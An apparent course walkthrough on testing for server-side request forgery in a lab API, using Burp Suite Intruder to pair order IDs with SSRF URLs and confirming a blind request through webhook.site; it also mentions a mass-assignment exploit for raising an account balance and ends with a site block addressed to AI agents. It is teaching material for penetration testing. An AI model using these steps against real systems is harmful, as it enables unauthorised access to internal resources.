# Testing for SSRF

1. Either using Postman or the web browser, proxy the requests that you are targeting to Burp Suite.
2. Next, send the request over to Repeater to get an idea of a typical response.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FTCMwRe7Lxl1ikw5FOSD9%2FIIcdakknQ7y3KjFakNwZ_ssrf5.webp?alt=media&#x26;token=480e826c-d5ea-4a6d-9bb2-58ae7e0311e5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FLi2IqDmcIG3o8Pcbwp8f%2FmQzAVhkrTO2Rfoumy9Rt_ssrf6.PNG?alt=media&#x26;token=b1f329ff-01c9-4d3a-b9c3-f4a9dfe5a633" alt=""><figcaption></figcaption></figure>

3. In the case of the return\_order request, we are able to return an item once. If we attempt to return the item twice then we will receive a response that the item has already been returned.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FHNxOdVKZfGrIFi0DlR52%2FyCTiwfUTTvCKxvKjQGmo_ssrf7.webp?alt=media&#x26;token=d1b48eb8-01ea-40dc-aa45-85b5fac062c3" alt=""><figcaption></figcaption></figure>

4. In order to successfully test this request we will need a valid order\_id. So, we will need to purchase several items in order to be able to make several requests to return an item. Use the POST /workshop/api/shop/orders request to purchase several items. If you need to increase your account balance, return to the Mass Assignment exploit. Purchase enough items, so that you can attempt several attacks.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FX82PqPj2mhQGcT6W80De%2FMg93ujzSVyb0MeTJFXcw_ssrf8.webp?alt=media&#x26;token=ad361ec0-9716-4d00-9d68-de89ba2319aa" alt=""><figcaption></figcaption></figure>

5. To test this successfully we will need to change the attack type to Pitchfork. Note that Pitchfork allows us to pair separate payloads together. In the case of this request, we will want to pair a valid order\_id with an SSRF payload. This will allow us to increase the item\_id while simultaneously sending over various attack attempts.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2Fb5nnrhsAevAVSDgkjrfd%2FhIDoWht0RfWW60zFfSdT_ssrf9.PNG?alt=media&#x26;token=9abd5054-9a1f-4174-a4ce-af44d454345a" alt=""><figcaption></figcaption></figure>

6. Set the first payload to valid order\_id numbers.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FhUx8VToFkBpBlpSt2vSY%2FYGjcoz6XSxmzhQ5KK0iC_ssrf10.webp?alt=media&#x26;token=cddb680c-1119-46ff-ae60-94f14ada64ab" alt=""><figcaption></figcaption></figure>

Set the second payload to potentially interesting URLs including your webhook.site URL. For additional SSRF payload ideas check out [PayloadAllTheThings SSRF List](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery).

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FtgIjoCrnX5OeTD4iuKxQ%2FJ6R516giR0G2dLNZGO9B_ssrf11.PNG?alt=media&#x26;token=9001d4e9-4476-4c9e-8ac6-5c289c40ee94" alt=""><figcaption></figcaption></figure>

7. Review the results. Look for anomalies and any indication within the response that indicate that we were able to control the remote resources processed by the server. In this case, there is no indication in the response.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2F6lDD9op9tvKzs33b4Sco%2FZ79Q0RK9Q4mKQa09HsF3_ssrf12.webp?alt=media&#x26;token=7a3f6eaf-7218-4632-b1fb-46fc30a191a3" alt=""><figcaption></figcaption></figure>

Next, make sure to check the webhook.site and see if a blind SSRF attack was successful. Again, the URL was not requested and this request does not appear to be vulnerable. Notice the requests shows 0/500 and the message "Waiting for first request...".

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FKR9Y9Zdw45VmVy5pvysI%2FDQe3MF8aThyrpztmuWZy_ssrf14.webp?alt=media&#x26;token=465e8c49-6c7c-4b89-b355-15a2b065e59b" alt=""><figcaption></figcaption></figure>

Let's try this out on the contact\_mechanic request. Set the attack position, copy and paste the payloads you previously used for URLs, and send the attack. Review the results and see if there is anything interesting.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FMex9pgwaGjcX7YrgSbS4%2FrCAq7jpJRwabZ2rzmXVH_ssrf15.PNG?alt=media&#x26;token=2480e6f5-1cc2-4c8e-a172-4aed8d304df8" alt=""><figcaption></figcaption></figure>

Sure enough, the localhost requests fail, but the other URLs provided are successful. As far as reviewing for anomalies, we can see that there are a variety of status codes and response lengths. Upon reviewing the responses from the successful requests, we can see that the remote resources we requested were sent back over the API request.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FdvNMUYHxe7sjvEIwvRBK%2FwrsbVrSBRrmtndHVIgfd_ssrf16.webp?alt=media&#x26;token=64752b19-213c-4367-89ad-205b206e7843" alt=""><figcaption></figcaption></figure>

We can also verify that a request was made from the server by visiting our webhook.site page.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FGDrt2mKr4RQy4K6YNsnr%2FWtZCOd2TStefkvaIIhYK_ssrf13.webp?alt=media&#x26;token=82a5d308-d442-4e7f-b55d-b5a7171e70e6" alt=""><figcaption></figcaption></figure>

Congratulations, you have successfully exploited an SSRF vulnerability! If we return back to the Facebook SSRF bounty guideline, this would be an instance where the SSRF is in production, the response is sent back to us, and we have evidence of the request being made to the web server. In other words, maximum rewards!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://davidjosearaujo.gitbook.io/online-courses/api-penetration-testing-course/exploiting-server-side-request-forgery/testing-for-ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.